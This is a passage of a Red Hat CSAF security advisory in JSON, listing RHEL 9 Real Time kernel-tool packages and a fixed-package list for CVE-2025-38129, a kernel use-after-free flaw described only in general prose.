"name": "libperf-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-38129",
"cwe": {
"id": "CWE-825",
"name": "Expired Pointer Dereference"
},
"discovery_date": "2025-07-03T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2376034"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel. This vulnerability, known as a use-after-free (UAF), occurs in the `page_pool_recycle_in_ring` function. A local attacker could exploit this by manipulating the system\u0027s memory management, causing a freed memory region to be improperly accessed. This can lead to system instability, unauthorized access to sensitive information, or potentially allow an attacker to execute malicious code.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: Linux kernel: Use-after-free vulnerability in page_pool_recycle_in_ring can lead to arbitrary code execution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Moderate impact. A use-after-free vulnerability in the Linux kernel\u0027s `page_pool_recycle_in_ring` function allows a local attacker to cause a denial-of-service or a kernel information leak problem. This flaw affects Red Hat Enterprise Linux 8, 9, and 10, as well as Red Hat In-Vehicle OS 1. Red Hat Enterprise Linux 6 and 7 are not affected as the vulnerable code is not present.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
